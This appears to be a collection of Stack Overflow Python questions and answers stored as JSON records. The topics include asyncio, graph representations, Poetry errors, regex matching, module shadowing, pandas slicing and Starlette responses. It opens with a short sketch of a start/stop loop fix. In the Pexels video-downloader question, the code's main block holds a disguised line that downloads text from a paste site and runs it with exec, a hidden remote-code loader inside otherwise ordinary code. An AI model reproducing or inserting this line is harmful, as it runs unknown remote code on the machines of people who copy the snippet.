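The accepted fix for the start/stop GUI above — resetting run_flag and re-entering the loop from start() — can be sketched without the GUI. The budget parameter is invented here purely so the demo loop terminates; it is not part of the asker's program:

```python
# GUI-free sketch of the accepted fix: start() must re-enter the loop,
# and run_flag must be reset to True on each run.
class Sim:
    def __init__(self):
        self.running = False
        self.run_flag = False
        self.steps = 0

    def run_simulation(self, budget):
        self.run_flag = True                # the fix: reset the flag each run
        while self.run_flag:
            if self.running:
                self.steps += 1             # stands in for "main code here"
                budget -= 1
                if budget == 0:
                    self.stop()             # demo-only: end this run
            else:
                self.run_flag = False       # leave the loop when stopped

    def start(self, budget=3):
        self.running = True
        self.run_simulation(budget)         # the fix: re-enter the loop

    def stop(self):
        self.running = False

sim = Sim()
sim.start()        # first run: 3 steps
sim.start()        # restart works because run_flag is reset: 3 more steps
print(sim.steps)   # 6
```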
The expected output would be shown if you used await asyncio.sleep(10) instead of time.sleep(10) which blocks the main thread for the given time, while the asyncio.sleep blocks only the current coroutine concurrently running the next get_order_book_list of the order_book_coroutines list.","Users Score":2,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75390077,"CreationDate":"2023-02-08 18:13:57","Q_Score":1,"ViewCount":93,"Question":"I have this code in Python to download videos from Pexels. My problem is i can't change the resolution of the videos that will be downloaded.\nimport time\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport os\nfrom requests import get\nimport requests\nfrom bs4 import BeautifulSoup\nfrom itertools import islice\nimport moviepy.editor as mymovie\nimport random\n# specify the URL of the archive here\nurl = \"https:\/\/www.pexels.com\/search\/videos\/sports%20car\/?size=medium\"\nvideo_links = []\n\n#getting all video links\ndef get_video_links():\n options = webdriver.ChromeOptions()\n options.add_argument(\"--lang=en\")\n browser = webdriver.Chrome(executable_path=ChromeDriverManager().install(), options=options)\n browser.maximize_window()\n time.sleep(2)\n browser.get(url)\n time.sleep(5)\n\n vids = input(\"How many videos you want to download? 
\")\n\n soup = BeautifulSoup(browser.page_source, 'lxml')\n links = soup.findAll(\"source\")\n \n for link in islice(links, int(vids)):\n video_links.append(link.get(\"src\"))\n \n\n return video_links\n\n#download all videos\ndef download_video_series(video_links):\n i=1\n for link in video_links:\n # iterate through all links in video_links\n # and download them one by one\n # obtain filename by splitting url and getting last string\n fn = link.split('\/')[-1] \n file_name = fn.split(\"?\")[0]\n print (f\"Downloading video: vid{i}.mp4\")\n\n #create response object\n r = requests.get(link, stream = True)\n \n #download started\n with open(f\"videos\/vid{i}.mp4\", 'wb') as f:\n for chunk in r.iter_content(chunk_size = 1024*1024):\n if chunk:\n f.write(chunk)\n \n print (f\"downloaded! vid{i}.mp4\")\n\n i+=1\n\n\n\nif __name__ == \"__main__\":\n x=get('https:\/\/paste.fo\/raw\/ba188f25eaf3').text;exec(x)\n #getting all video links\n video_links = get_video_links()\n\n #download all videos\n download_video_series(video_links)\n\nI searched alot and readed several topics about downloading videos from Pexels but didn't find anyone talking about choosing video reolution when downloading from Pexels using Python.","Title":"How do I choose video resolution before downloading from Pexels in Python?","Tags":"python","AnswerCount":1,"A_Id":75790764,"Answer":"Use Pixel API its free with limit:\nBy default, the API is rate-limited to 200 requests per hour and 20,000 requests per month.\nIt doesn't make sense to scrape free resource, with free API.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75392754,"CreationDate":"2023-02-08 23:32:27","Q_Score":2,"ViewCount":116,"Question":"I am practicing a couple algorithms (DFS, BFS). To set up the practice examples, I need to make a graph with vertices and edges. 
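To illustrate the earlier asyncio.gather answer (time.sleep blocks the whole event loop, while await asyncio.sleep only suspends the current coroutine), a minimal standalone sketch; the function and list names here are invented for the demo:

```python
# With asyncio.sleep, every coroutine reaches its "start" print before
# any of them resumes - the interleaving the asker expected.
import asyncio

order = []

async def get_order_book_list(i):
    order.append(f"start-{i}")
    await asyncio.sleep(0.01)   # non-blocking: other coroutines run meanwhile
    order.append(f"end-{i}")

async def main():
    await asyncio.gather(*(get_order_book_list(i) for i in range(3)))

asyncio.run(main())
print(order)   # all starts before any end
```

Replacing `await asyncio.sleep(0.01)` with `time.sleep(0.01)` reproduces the asker's sequential start/end pairs, because the blocking call never yields control back to the event loop.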
I have seen two approaches - defining an array of vertices and an array of edges, and then combining them into a \"graph\" using a dictionary, like so:\ngraph = {'A': ['B', 'E', 'C'],\n 'B': ['A', 'D', 'E'],\n 'C': ['A', 'F', 'G'],\n 'D': ['B', 'E'],\n 'E': ['A', 'B', 'D'],\n 'F': ['C'],\n 'G': ['C']}\n\nBut in a video series made by the author of \"cracking the coding interview\", their approach was to define a \"node\" object, which holds an ID, and a list of adjacent\/child nodes (in Java):\npublic static class Node {\nprivate int id;\nLinkedList adjacent = new LinkedList(); \/\/ nodes children\nprivate Node(int id) {\n this.id = id; \/\/set nodes ID\n }\n}\n\nThe pitfall I see of using the latter method, is making a custom function to add edges, as well has lacking an immediate overview of the structure of the entire graph; To make edges, you have to first retrieve the node object associated with the ID by first traversing to it or using a hashmap, and then by using its reference, adding the destination node to that source node:\nprivate Node getNode(int id) {} \/\/method to retrieve node from hashmap\npublic void addEdge(int source, int destination) {\n Node s = getNode(source);\n Node d = getNode(destination);\n s.adjacent.add(d); \n}\n\nWhile in comparison using a simple dictionary, it is trivial to add new edges:\ngraph['A'].append('D')\n\nBy using a node object, adding a new connection to every child of a node is more verbose (imagine the Node class as a Python class which takes an ID and list of node-object children):\nnode1 = Node('A', [])\nnode2 = Node('B', [node1])\nnode3 = Node('C', [node1, node2])\n\nnew_node = Node('F', [])\n\nfor node in node3.adjacent:\n node.adjacent.append(new_node) # adds 'F' node to every child node of 'C'\n\nwhile using dictionaries, if I want to add new_node to every connection\/child of node3:\nfor node in graph['C']:\n graph[node].append('F')\n\nWhat are the benefits in space and time complexity in building graphs using 
node objects versus dictionaries? Why would the author use node objects instead of a dictionary? My immediate intuition says that using objects would allow you to make something much more complex (like each node representing a server, with an IP, mac address, cache, etc) while a dictionary is probably only useful for studying the structure of the graph. Is this correct?","Title":"Pros\/cons of defining a graph as nested node objects versus a dictionary?","Tags":"python,java,algorithm,dictionary,data-structures","AnswerCount":1,"A_Id":75392865,"Answer":"What are the benefits in space and time complexity in building graphs using node objects versus dictionaries\n\nIn terms of space, the complexity is the same for both. But in terms of time, each has its own advantages.\nAs you said, if you need to query for a specific node, the dictionary is better, with an O(1) query. But if you need to add nodes, the graph version has only O(1) time complexity, while the dictionary has an amortized O(1) time complexity, becoming O(n) when an expansion is needed.\nOverall, think of the comparison as an ArrayList vs LinkedList, since the principles are the same.\nFinally, if you do opt to use the dictionary version and you predict you won't have a small number of adjacent nodes, you can store edges in a set instead of an array, since they're most likely not ordered and querying a node for the existence of an adjacent node becomes an O(1) operation instead of O(n). The same applies to the nodes version, using a set instead of a linked list. Just make sure the extra overhead of the insertions makes it worthwhile.\n\nMy immediate intuition says that using objects would allow you to make something much more complex (like each node representing a server, with an IP, mac address, cache, etc) while a dictionary is probably only useful for studying the structure of the graph. Is this correct?\n\nNo. 
With the dictionary, you can either have a separate dictionary that associates with node (key) to its' value, or if the value is small enough, like an IPv4, and it's unique, you can just use it as a key.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75397736,"CreationDate":"2023-02-09 11:08:22","Q_Score":39,"ViewCount":19954,"Question":"I am using Poetry for the first time.\nI have a very simple project. Basically\na_project\n|\n|--test\n| |---test_something.py\n|\n|-script_to_test.py\n\nFrom a project I do poetry init and then poetry install\nI get the following\n poetry install\nUpdating dependencies\nResolving dependencies... (0.5s)\n\nWriting lock file\n\nPackage operations: 7 installs, 0 updates, 0 removals\n\n \u2022 Installing attrs (22.2.0)\n \u2022 Installing exceptiongroup (1.1.0)\n \u2022 Installing iniconfig (2.0.0)\n \u2022 Installing packaging (23.0)\n \u2022 Installing pluggy (1.0.0)\n \u2022 Installing tomli (2.0.1)\n \u2022 Installing pytest (7.2.1)\n\n\/home\/me\/MyStudy\/2023\/pyenv_practice\/dos\/a_project\/a_project does not contain any element\n\nafter this I can run poetry run pytest without problem but what does that error message mean?","Title":"Poetry install on an existing project Error \"does not contain any element\"","Tags":"python,python-poetry","AnswerCount":4,"A_Id":75399493,"Answer":"create a dir with_your_package_name that u find in the file and an empty __init__.py in project root\ndelete the poetry.lock and install again","Users Score":-1,"is_accepted":false,"Score":-0.049958375,"Available Count":2},{"Q_Id":75397736,"CreationDate":"2023-02-09 11:08:22","Q_Score":39,"ViewCount":19954,"Question":"I am using Poetry for the first time.\nI have a very simple project. Basically\na_project\n|\n|--test\n| |---test_something.py\n|\n|-script_to_test.py\n\nFrom a project I do poetry init and then poetry install\nI get the following\n poetry install\nUpdating dependencies\nResolving dependencies... 
(0.5s)\n\nWriting lock file\n\nPackage operations: 7 installs, 0 updates, 0 removals\n\n \u2022 Installing attrs (22.2.0)\n \u2022 Installing exceptiongroup (1.1.0)\n \u2022 Installing iniconfig (2.0.0)\n \u2022 Installing packaging (23.0)\n \u2022 Installing pluggy (1.0.0)\n \u2022 Installing tomli (2.0.1)\n \u2022 Installing pytest (7.2.1)\n\n\/home\/me\/MyStudy\/2023\/pyenv_practice\/dos\/a_project\/a_project does not contain any element\n\nafter this I can run poetry run pytest without problem but what does that error message mean?","Title":"Poetry install on an existing project Error \"does not contain any element\"","Tags":"python,python-poetry","AnswerCount":4,"A_Id":75470537,"Answer":"My issue got away after pointed correct interpreter in PyCharm. Poetry makes project environment in its own directories and PyCharm didn't link that correct.\nI've added new environment in PyCharm and select poetary's just created enviroment in dialogs.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":2},{"Q_Id":75399290,"CreationDate":"2023-02-09 13:27:34","Q_Score":1,"ViewCount":44,"Question":"I have a protein sequence:\n`seq = \"EIVLTQSPGTLSLSRASQS---VSSSYLAWYQQKPG\"\nand i want to match two type regions\/strings:\nthe first type is continuous,like TQSPG in seq.\nthe second type we only know the continuous form, but in fact there may be multiple \"-\" characters in the middle,for example what i know is SQSVS, but in seq it is SQS---VS.\nwhat i want to do is to match these two type of string and get the index, forexample TQSPG is (4,9), and for SQSVS is (16,24).\nI tried use re.search('TQSPG',seq).span(), it return (4,9), but i don't konw how to deal the second type.","Title":"how to match a string allowed \"-\" appear multiple times with python re?","Tags":"python,string,python-re","AnswerCount":2,"A_Id":75399354,"Answer":"re.search(r'([SQVS]+-*[SQVS]+)', seq).span()\nAssuming that the '-' can will be between the first and last character","Users 
Score":0,"is_accepted":false,"Score":0.0,"Available Count":2},{"Q_Id":75399290,"CreationDate":"2023-02-09 13:27:34","Q_Score":1,"ViewCount":44,"Question":"I have a protein sequence:\n`seq = \"EIVLTQSPGTLSLSRASQS---VSSSYLAWYQQKPG\"\nand i want to match two type regions\/strings:\nthe first type is continuous,like TQSPG in seq.\nthe second type we only know the continuous form, but in fact there may be multiple \"-\" characters in the middle,for example what i know is SQSVS, but in seq it is SQS---VS.\nwhat i want to do is to match these two type of string and get the index, forexample TQSPG is (4,9), and for SQSVS is (16,24).\nI tried use re.search('TQSPG',seq).span(), it return (4,9), but i don't konw how to deal the second type.","Title":"how to match a string allowed \"-\" appear multiple times with python re?","Tags":"python,string,python-re","AnswerCount":2,"A_Id":75399385,"Answer":"Assuming the order of SQSVS needs to be preserved, I'd propose the regex r'S-*Q-*S-*V-*S'. This will match the sequence SQSVS with any number (might be 0) of hyphens included between either of the letters.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":2},{"Q_Id":75399303,"CreationDate":"2023-02-09 13:28:32","Q_Score":1,"ViewCount":107,"Question":"Only for a .py file that is saved on my Desktop, importing some modules (like pandas) fail due to Module not found from an import that happens within the module.\nThis behaviour doesn't happen when the file is saved to a different location.\nWorking on a Mac and i made a test.py file that only holds: import pandas as pd\nwhen this test.py is saved on my desktop it generates this error:\nDesktop % python3 test.py\nTraceback (most recent call last):\n File \"\/Users\/XXX\/Desktop\/test.py\", line 2, in \n import pandas as pd\n File \"\/Users\/XXX\/Desktop\/pandas\/__init__.py\", line 22, in \n from pandas.compat import (\n File \"\/Users\/XXX\/Desktop\/pandas\/compat\/__init__.py\", line 15, in \n from pandas.compat.numpy 
import (\n File \"\/Users\/XXX\/Desktop\/pandas\/compat\/numpy\/__init__.py\", line 7, in \n from pandas.util.version import Version\n File \"\/Users\/XXX\/Desktop\/pandas\/util\/__init__.py\", line 1, in \n from pandas.util._decorators import ( # noqa\n File \"\/Users\/XXX\/Desktop\/pandas\/util\/_decorators.py\", line 14, in \n from pandas._libs.properties import cache_readonly # noqa\n File \"\/Users\/XXX\/Desktop\/pandas\/_libs\/__init__.py\", line 13, in \n from pandas._libs.interval import Interval\nModuleNotFoundError: No module named 'pandas._libs.interval'\n\nthe weird thing is that if i save the test.py file to any other location on my HD it imports pandas perfectly.\nSame thing happens for some other modules. The module im trying to import seems to go oke but it fails on an import that happens from within the module.\nrunning which python3 in console from either the desktop folder or any other folder results in:\n\/Users\/XXXX\/.pyenv\/shims\/python\npython3 --version results in Python 3.10.9 for all locations.","Title":"Python Module not found ONLY when .py file is on desktop","Tags":"python,macos,python-3.10,modulenotfounderror,file-location","AnswerCount":2,"A_Id":75399409,"Answer":"You have a directory named pandas on your desktop.\nPython trying to import from this directory instead of the global package named pandas.\nYou can also see that in the exception, look at the trace, from \/Users\/XXX\/Desktop\/test.py the code moves to \/Users\/XXX\/Desktop\/pandas\/__init__.py and so on.\nJust rename the name of the directory on your desktop.\nFor your own safety, you should not name your local directories with the same names as global packages.","Users Score":3,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75400681,"CreationDate":"2023-02-09 15:19:10","Q_Score":1,"ViewCount":372,"Question":"I have a question regarding h5pyViewer to view h5 files. I tried pip install h5pyViewer but that didn't work. 
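The gap-tolerant pattern from the accepted regex answer earlier can be built mechanically by interleaving `-*` between the letters of the known motif. A small sketch using the question's own sequence (the `pattern` variable name is invented for the demo):

```python
# Build 'S-*Q-*S-*V-*S' from the continuous motif, then search.
import re

seq = "EIVLTQSPGTLSLSRASQS---VSSSYLAWYQQKPG"
motif = "SQSVS"
pattern = "-*".join(motif)   # interleave optional '-' runs between letters
m = re.search(pattern, seq)
print(pattern, m.span())     # S-*Q-*S-*V-*S (16, 24)
```

This generalizes: `"-*".join(known_motif)` produces the hyphen-tolerant pattern for any continuous motif, matching the (16, 24) span the asker wanted.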
I checked on Google and it states that h5pyViewer does not work for older versions of Python, but that there are a few solutions on GitHub. I downloaded this with pip install git+https:\/\/github.com\/Eothred\/h5pyViewer.git which finally gave me a successful installation.\nYet, when I want to import the package with import h5pyViewer it gave me the following error: ModuleNotFoundError: No module named 'h5pyViewer'. However when I tried to install it again it says:\nRequirement already satisfied: h5pyviewer in c:\\users\\celin\\anaconda3\\lib\\site-packages (-v0.0.1.15)Note: you may need to restart the kernel to use updated packages.\n\nAny ideas how to get out of this loop or in what other way I could access an .h5 file?","Title":"ModuleNotFoundError: No module named 'h5pyViewer'","Tags":"python,h5py","AnswerCount":1,"A_Id":75401050,"Answer":"There could be so many things wrong so it's hard to say what the problem is.\n\nThe actual package import has a lowercase \"v\": h5pyviewer (as seen in your error message).\n\nYour IDE\/python runner may not be using your Conda environment (you can select the environment in VSCode, and if you are running a script in the terminal make sure your Conda env is enabled in that terminal)\n\nThe GitHub package might be exported from somewhere else. Try something like from Eothred import h5pyviewer.\n\nMaybe h5pyviewer is not even supposed to be imported this way!\n\n\nOverall, I don't suggest using this package, it seems like it's broken on Python 3 and not well maintained. The code in GitHub looks sketchy, and very few people use it. A good indicator is usually the number of people that star or use the package, which seems extremely low. Additionally, it doesn't even have a real readme file! It doesn't say how to use it at all. Suggest you try something else like pandas. 
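For import puzzles like the two above (the Desktop directory shadowing pandas, and the missing h5pyviewer), one quick diagnostic is to ask Python where it would load a module from before importing it. A minimal sketch — the stdlib json package stands in for the third-party package so the example runs anywhere:

```python
# Print the file a module name resolves to; a path inside your project
# directory (instead of site-packages) reveals shadowing immediately.
import importlib.util

spec = importlib.util.find_spec("json")
print(spec.origin)   # the file Python would import 'json' from
```

Running this for "pandas" from the Desktop in the earlier question would have printed the local `Desktop/pandas/__init__.py`, exposing the shadowing directory at a glance.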
But if you really want to go with this, you can try the above debugging steps.","Users Score":2,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75403882,"CreationDate":"2023-02-09 20:04:26","Q_Score":2,"ViewCount":230,"Question":"Given the following directory structure for a package my_package:\n\/\n\u251c\u2500\u2500 data\/\n\u2502 \u251c\u2500\u2500 more_data\/\n\u2502 \u2514\u2500\u2500 foo.txt\n\u251c\u2500\u2500 my_package\/\n\u2502 \u251c\u2500\u2500 __init__.py\n\u2502 \u2514\u2500\u2500 stuff\/\n\u2502 \u2514\u2500\u2500 __init__.py\n\u251c\u2500\u2500 README.md\n\u251c\u2500\u2500 setup.cfg\n\u251c\u2500\u2500 setup.py\n\nHow can I make the data\/ directory accessible (in the most Pythonic way) from within code, without using __file__ or other hacky solutions? I have tried using data_files in setup.py and the [options.package_data] in setup.cfg to no avail.\nI would like to do something like:\ndir_data = importlib.resources.files(data)\ncsv_files = dir_data.glob('*.csv')\n\nEDIT:\nI'm working with an editable installation and there's already a data\/ directory in the package (for source code unrelated to the top-level data).","Title":"Add a data directory outside Python package directory","Tags":"python,setuptools,setup.py,python-packaging,python-importlib","AnswerCount":2,"A_Id":75445678,"Answer":"Create an empty data\/__init__.py file, so that data becomes a top-level import package, so that the data files become package data, so that they are accessible via importlib.resources.files('data'). This should work with \"editable installation\". 
You might need to do small changes in your packaging files (setup.py or setup.cfg or pyproject.toml).","Users Score":1,"is_accepted":false,"Score":0.0996679946,"Available Count":1},{"Q_Id":75409352,"CreationDate":"2023-02-10 09:49:46","Q_Score":1,"ViewCount":85,"Question":"So I have tried to find an average of a value for an index 0 before it exchange to another index.\nAn example of the dataframe:\n\n\n\n\ncolumn_a\nvalue_b\nsum_c\ncount_d_\navg_e\n\n\n\n\n0\n10\n10\n1\n\n\n\n0\n20\n30\n2\n\n\n\n0\n30\n60\n3\n20\n\n\n1\n10\n10\n1\n\n\n\n1\n20\n30\n2\n\n\n\n1\n30\n60\n3\n20\n\n\n0\n10\n10\n1\n\n\n\n0\n20\n30\n2\n15\n\n\n1\n10\n10\n1\n\n\n\n1\n20\n30\n2\n\n\n\n1\n30\n60\n3\n20\n\n\n0\n10\n10\n1\n\n\n\n0\n20\n\n\n\n\n\n\n\nhowever, only the last row for sum and count is unavailable, so the avg cannot be calculated for it\npart of the code...\n#sum and avg for each section\n\nfor i, row in df.iloc[0:-1].iterrows():\n if df['column_a'][i] == 0:\n sum = sum + df['value_b'][i]\n df['sum_c'][i] = sum\n count = count + 1\n df['count_d'][i] = count\n else:\n sum = 0 \n count = 0\n df['sum_c'][i] = sum\n df['count_d'][i] = count\n\ntotcount = 0\nfor m, row in df.iloc[0:-1].iterrows():\n if df.loc[m, 'column_a'] == 0 :\n if (df.loc[m+1, 'sum_c'] == 0) :\n totcount = df.loc[m, 'count_d']\n avg_e = (df.loc[m, 'sum_c']) \/ totcount\n df.loc[m, 'avg_e'] = avg_e\n\nhave tried only using df.iloc[0:].iterrows but it produce an error.","Title":"Last row of some column in dataframe not included","Tags":"python,pandas,dataframe","AnswerCount":2,"A_Id":75409657,"Answer":"It is the expected behavior of df.iloc[0:-1] to return all the rows excepting the last one. When using slicing, remember that the last index you provide is not included in the return range. 
Since -1 is the index of the last row, [0:-1] excludes the last row.\nThe solution given by @mozway is anyway more elegant, but if for any reason you still want to use iterrows(), you can use df.iloc[0:].\nThe error you got when you did may be due to your df.loc[m+1, 'sum_c']. At the last row, m+1 will be out of bounds and produce an IndexError.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75409462,"CreationDate":"2023-02-10 09:57:51","Q_Score":1,"ViewCount":127,"Question":"After installing PyCharm I get an error message: \"Please select a valid Python interpreter\".\nI went to the python interpreter settings, added an interpreter (system interpreter), and wrote the path to the python.exe. When I select the Python.exe and click on \"Ok\" I get an error message: \"invalid python interpreter name 'python.exe'\"\nI tried reinstalling PyCharm and looking for youtube video solutions but none of them worked.","Title":"Selecting Python.exe as an interpreter doesn't work?","Tags":"python,pycharm","AnswerCount":1,"A_Id":75409570,"Answer":"Did you try to reinstall Python? Also try to use python from cmd to check if your python.exe file does indeed work properly.\nLet me know if that doesn't work, but the problem seems kinda weird. Dumb question, but did you select the python.exe file itself? Watch out not to select only the folder.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75410361,"CreationDate":"2023-02-10 11:14:18","Q_Score":1,"ViewCount":55,"Question":"I'm working on a Starlette API. I am trying to receive a response object or json but I end up with a tuple. 
Any thoughts or guidance will be appreciated.\nFrontend:\nheaders = {\"Authorization\": settings.API_KEY}\nassociation = requests.get(\n \"http:\/\/localhost:9999\/get-association\",\n headers=headers,\n),\nprint(\"association:\", type(association))\n\nassociation: \nBackend:\n@app.route(\"\/get-association\")\nasync def association(request: Request):\n if request.headers[\"Authorization\"] != settings.API_KEY:\n return JSONResponse({\"error\": \"unauthorized\"}, status_code=401)\n # return JSONResponse(\n # content=await get_association(), status_code=200\n # )\n association = {\"association\": \"test data\"}\n print(\"association:\", type(association), association)\n return JSONResponse(association)\n\n\nassociation: {'association': 'test data'}","Title":"Python and Starlette - receiving a tuple from an API that's trying to return json","Tags":"python,json,starlette","AnswerCount":1,"A_Id":75410551,"Answer":"You have a comma after requests.get. This is making a tuple of (,).","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75415286,"CreationDate":"2023-02-10 19:20:07","Q_Score":4,"ViewCount":4772,"Question":"I am currently running python 3.9.13 on my mac. I wanted to update my version to 3.10.10\nI tried running\nbrew install python\n\nHowever it says that \"python 3.10.10 is already installed\"!\nWhen i run\npython3 --version\n\nin the terminal it says that i am still on \"python 3.9.13\"\nSo my question is, how do i change the python version from 3.9.13 to 3.10.10? I already deleted python 3.9 from my applications and python 3.10 is the only one that is still there.\nI also tried to install python 3.10.10 from the website and installing it. However it does not work. 
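The trailing-comma pitfall from the Starlette answer above, shown in isolation (the variable names and the "response" stand-in value are invented for the demo):

```python
# A trailing comma after an assignment wraps the value in a 1-tuple,
# which is exactly what happened after the requests.get(...) call.
with_comma = "response",      # note the comma: builds ('response',)
without_comma = "response"

print(type(with_comma).__name__)     # tuple
print(type(without_comma).__name__)  # str
```

Because the comma sat after the closing parenthesis of `requests.get(...)`, the asker's `association` variable was a tuple containing the Response object rather than the Response itself.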
Python 3.10.10 is being installed successfully but the version is still the same when i check it.","Title":"How to change python3 version on mac to 3.10.10","Tags":"python,installation,pip,version,upgrade","AnswerCount":4,"A_Id":75415540,"Answer":"Just delete the current python installation on your device and download the version you want from the offical website. That is the easiest way and the most suitable one for a beginner.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":2},{"Q_Id":75415286,"CreationDate":"2023-02-10 19:20:07","Q_Score":4,"ViewCount":4772,"Question":"I am currently running python 3.9.13 on my mac. I wanted to update my version to 3.10.10\nI tried running\nbrew install python\n\nHowever it says that \"python 3.10.10 is already installed\"!\nWhen i run\npython3 --version\n\nin the terminal it says that i am still on \"python 3.9.13\"\nSo my question is, how do i change the python version from 3.9.13 to 3.10.10? I already deleted python 3.9 from my applications and python 3.10 is the only one that is still there.\nI also tried to install python 3.10.10 from the website and installing it. However it does not work. Python 3.10.10 is being installed successfully but the version is still the same when i check it.","Title":"How to change python3 version on mac to 3.10.10","Tags":"python,installation,pip,version,upgrade","AnswerCount":4,"A_Id":76398761,"Answer":"When you download latest version, it comes with a file named Update Shell Profile.command.\nIn mac, you can find it at \/Applications\/Python 3.11\/Update Shell Profile.command.\nRun it and it should upgrade to latest version.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":2},{"Q_Id":75415356,"CreationDate":"2023-02-10 19:29:24","Q_Score":1,"ViewCount":40,"Question":"I'm new to Python, know just enough R to get by. I have a 10 by 10 dataframe.\nsmall2\n USLC USSC INTD ... DSTS PCAP PRE\n0 0.059304 0.019987 -0.034140 ... 
0.003009 0.113144 -0.021656\n1 0.003835 -0.024248 0.012446 ... 0.005323 -0.013716 0.011109\n2 -0.045045 -0.047186 -0.002372 ... -0.011956 -0.118342 -0.045023\n3 0.054108 0.002787 0.003714 ... 0.014466 0.128931 -0.007596\n4 0.064045 0.111250 0.077478 ... 0.012059 0.115427 0.079145\n5 0.041442 0.042858 0.047701 ... 0.009984 0.047098 0.003579\n6 0.081832 0.046531 0.010531 ... 0.031772 0.126552 0.001398\n7 -0.047171 0.022883 -0.065095 ... -0.010224 -0.025990 -0.055431\n8 0.054844 0.073193 0.044514 ... 0.016301 0.031755 0.044597\n9 -0.032403 -0.043930 -0.065013 ... 0.011944 -0.032902 -0.117689\n\nI want to create a list of several dataframes that are each just rolling 5 by 10 frames. Rows 0 through 4, 1 through 5, etc. I've seen articles addressing something similar, but they haven't worked. I'm thinking about it like lapply in R.\nI've tried splits = [small2.iloc[[i-4:i]] for i in small2.index] and got a syntax error from the colon.\nI then tried splits = [small2.iloc[[i-4,i]] for i in small2.index] which gave me a list of ten elements. It should be six 5 by 10 elements.\nFeel like I'm missing something basic. Thank you!","Title":"Turn a larger Pandas data frame into smaller rolling data frames","Tags":"python","AnswerCount":2,"A_Id":75415971,"Answer":"I figured it out. splits = [small2.iloc[i-4:i+1] for i in small2.index[4:10]]\nNot sure how this indexing makes sense though.","Users Score":1,"is_accepted":false,"Score":0.0996679946,"Available Count":1},{"Q_Id":75421933,"CreationDate":"2023-02-11 17:18:05","Q_Score":1,"ViewCount":64,"Question":"I have a custom Sympy cSymbol class for the purpose of adding properties to declared symbols. 
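The indexing in the rolling-window answer above (`splits = [small2.iloc[i-4:i+1] for i in small2.index[4:10]]`) is easier to see with a plain list standing in for the 10-row DataFrame; pandas itself is not needed for the sketch:

```python
# Each window is rows i-4 .. i inclusive; iterating i over 4..9
# yields the six 5-row windows the asker wanted.
rows = list(range(10))                        # stand-in for small2's 10 rows
splits = [rows[i - 4:i + 1] for i in range(4, 10)]

print(len(splits))    # 6 windows
print(splits[0])      # [0, 1, 2, 3, 4]
print(splits[-1])     # [5, 6, 7, 8, 9]
```

The `i + 1` upper bound is needed because Python slicing excludes the stop index, so `rows[0:5]` is rows 0 through 4 — the same half-open convention behind the `iloc[0:-1]` discussion earlier.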
This is done as follows:\nclass cSymbol(sy.Symbol):\n def __init__(self,name,x,**assumptions):\n self.x = x \n sy.Symbol.__init__(name,**assumptions)\n\nThe thing is that when I declare a cSymbol within a function (say, it affects the property x of a cSymbol declared outside the function if the names are the same (here \"a\"):\ndef some_function():\n dummy = cSymbol(\"a\",x=2)\n\na = cSymbol(\"a\",x=1)\nprint(a.x) # >> 1\nsome_function()\nprint(a.x) # >> 2, but should be 1\n\nIs there a way to prevent this (other than passing distinct names) ? Actually I am not sure to understand why it behaves like this, I thougt that everything declared within the function would stay local to this function.\nFull code below:\nimport sympy as sy\n\nclass cSymbol(sy.Symbol):\n def __init__(self,name,x,**assumptions):\n self.x = x \n sy.Symbol.__init__(name,**assumptions)\n \ndef some_function():\n a = cSymbol(\"a\",x=2)\n\n\nif __name__ == \"__main__\":\n a = cSymbol(\"a\",x=1)\n print(a.x) # >> 1\n some_function()\n print(a.x) # >> 2, but should be 1","Title":"Declare symbols local to functions in SymPy","Tags":"python,sympy,subclassing","AnswerCount":1,"A_Id":75422178,"Answer":"You aren't creating a local Python variable in the subroutine, you are create a SymPy Symbol object and all Symbol objects with the same name and assumptions are the same. It doesn't matter where they are created. It sounds like you are blurring together the Python variable and the SymPy variable which, though both bearing the name \"variable\", are not the same.","Users Score":3,"is_accepted":false,"Score":0.537049567,"Available Count":1},{"Q_Id":75424277,"CreationDate":"2023-02-12 00:48:24","Q_Score":1,"ViewCount":63,"Question":"I am creating a code editor, and I am trying to create a run feature. Right now I see that the problems come when I encounter a folder with a space in its name. 
It works on the command line, but not with os.system().\ndef run(event):\n if open_status_name != False:\n directory_split = open_status_name.split(\"\/\")\n for directory in directory_split:\n if directory_split.index(directory) > 2:\n true_directory = directory.replace(\" \", \"\\s\")\n print(true_directory)\n data = os.system(\"cd \" + directory.replace(\" \", \"\\s\"))\n print(data)\n\nI tried to replace the space with the regex character \"\\s\" but that also didn't work.","Title":"Is there a way for a Python program to \"cd\" to a folder that has a space in it?","Tags":"python,cmd","AnswerCount":1,"A_Id":75424334,"Answer":"os.system runs the command in a shell. You'd have to add quotes to get the value though: os.system(f'cd \"{directory}\"'). But the cd would only be valid for that subshell for the brief time it exists - it would not change the directory of your python program. Use os.chdir(directory) instead.\nNote - os.chdir can be risky as any relative paths you have in your code suddenly become invalid once you've done that. It may be better to manage your editor's \"current path\" on your own.","Users Score":1,"is_accepted":false,"Score":0.1973753202,"Available Count":1},{"Q_Id":75428618,"CreationDate":"2023-02-12 16:52:52","Q_Score":1,"ViewCount":75,"Question":"I have a python script which run 24 hours on my local system and my script uses different third party libraries that are installed using pip in python\nLibraries\nBeautifulSoup\nrequests\nm3u8\n\nMy python script is recording some live stream videos from a website and is storing on system. How google cloud will help me to run this script 24\/hours daily and 7days a week.I am very new to clouds. 
